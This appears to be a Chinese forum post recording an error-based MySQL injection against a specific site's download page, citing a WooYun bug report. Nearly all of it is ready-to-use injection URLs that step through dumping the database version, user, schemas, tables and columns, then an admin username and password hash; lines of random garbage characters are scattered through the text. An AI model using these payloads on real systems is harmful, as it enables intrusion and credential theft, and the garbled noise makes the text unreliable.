php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666
" X  H& R$ [) e3 N9 e. f
之前想找个测试 没想到这有 可以测试下做个记录而已
5 e0 u: T+ q$ S( P# P- Q3 R
6 O  B" @: Z0 i2 X$ J- ~. n/ W: U3 zhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

+ F& J! l2 @1 X2 a! w/data0/htdocs/leqi_new/app/myapp.php

4 Q$ `5 O0 A' X/ R& o+ Z 或者

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/  
; v' l/ Y+ H1 ^9 Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* Y3 {' ^% [/ C" _0 |
/**********database()**********/  leqi
$ H6 [% f8 \* F. ]! [; ~9 |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

1 a* h7 b6 i. V# B- o/**********limit依次递归爆库**********/
& s# u' u8 W% m' o5 c2 ?/ M. ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! E$ g/ T4 J. Jinformation_schema
- Y/ S* a4 P. c+ N+ q+ Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
6 k% r: D" q+ _# l3 }$ Jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 I7 m6 e" k- ~) I0 }. w* `3 H7 B4 atest
: i: Z/ X1 q: n! _
/**********limit依次递归爆表名**********/
4 n4 e0 Z! F( Q& Z7 y% v$ l( Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 g0 ]" ]( h4 K+ ]/ |users

" ~& x( J6 K3 f" g& A/**********limit依次递归爆字段名**********/
& _9 `: D! d3 J0 w  S6 D* yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! R$ X8 e- ~! r* x: Z5 P- Euser_id,username,nickname,passwd,group_id
3 k) l* L8 _0 a' m& \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
  D* @' y. H/ Q11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
8 v  r3 H) C: z+ G2 b6 K: t11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
' Z+ I+ p' l/ T7 h5 ]$ vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
8 o# p; f1 m7 M$ W% W% t! ?/ s